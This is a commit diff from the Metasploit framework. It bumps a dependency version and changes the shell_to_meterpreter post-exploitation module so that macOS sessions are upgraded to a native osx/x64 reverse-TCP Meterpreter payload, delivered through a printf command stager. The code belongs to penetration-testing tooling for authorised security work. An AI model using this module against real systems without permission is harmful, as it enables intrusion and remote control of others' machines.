Land rapid7#9607, upgrade osx shells to osx meterpreter

Author: busterb

Gemfile.lock

@@ -264,7 +264,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.16)
+    rex-exploitation (0.1.17)
       jsobfu
       metasm
       rex-arch

modules/post/multi/manage/shell_to_meterpreter.rb

@@ -81,8 +81,10 @@ def run
       psh_arch = 'x86'
       vprint_status("Platform: Windows")
     when 'osx'
-      platform = 'python'
-      payload_name = 'python/meterpreter/reverse_tcp'
+      platform = 'osx'
+      payload_name = 'osx/x64/meterpreter/reverse_tcp'
+      lplat = [Msf::Platform::OSX]
+      larch = [ARCH_X64]
       vprint_status("Platform: OS X")
     when 'solaris'
       platform = 'python'
@@ -99,8 +101,10 @@ def run
         larch = [ARCH_X86]
         vprint_status("Platform: Linux")
       elsif target_info =~ /darwin/i
-        platform = 'python'
-        payload_name = 'python/meterpreter/reverse_tcp'
+        platform = 'osx'
+        payload_name = 'osx/x64/meterpreter/reverse_tcp'
+        lplat = [Msf::Platform::OSX]
+        larch = [ARCH_X64]
         vprint_status("Platform: OS X")
       elsif cmd_exec('python -V 2>&1') =~ /Python (2|3)\.(\d)/
         # Generic fallback for OSX, Solaris, Linux/ARM
@@ -162,7 +166,7 @@ def run
           print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
           vprint_status("Transfer method: VBS [fallback]")
           exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
-          aborted = transmit_payload(exe)
+          aborted = transmit_payload(exe, platform)
         end
       end
     when 'python'
@@ -171,7 +175,7 @@ def run
     else
       vprint_status("Transfer method: Bourne shell [fallback]")
       exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
-      aborted = transmit_payload(exe)
+      aborted = transmit_payload(exe, platform)
     end
 
     if datastore['HANDLER']
@@ -181,7 +185,7 @@ def run
     return nil
   end
 
-  def transmit_payload(exe)
+  def transmit_payload(exe, platform)
     #
     # Generate the stager command array
     #
@@ -193,16 +197,18 @@ def transmit_payload(exe)
       :linemax => linemax,
       #:nodelete => true # keep temp files (for debugging)
     }
-    if session.platform == 'windows'
+    case platform
+    when 'windows'
       opts[:decoder] = File.join(Rex::Exploitation::DATA_DIR, "exploits", "cmdstager", 'vbs_b64')
       cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
+    when 'osx'
+      opts[:background] = true
+      cmdstager = Rex::Exploitation::CmdStagerPrintf.new(exe)
     else
       opts[:background] = true
       opts[:temp] = datastore['BOURNE_PATH']
       opts[:file] = datastore['BOURNE_FILE']
       cmdstager = Rex::Exploitation::CmdStagerBourne.new(exe)
-      # Note: if a OS X binary payload is added in the future, use CmdStagerPrintf
-      #       as /bin/sh on OS X doesn't support the -n option on echo
     end
 
     cmds = cmdstager.generate(opts)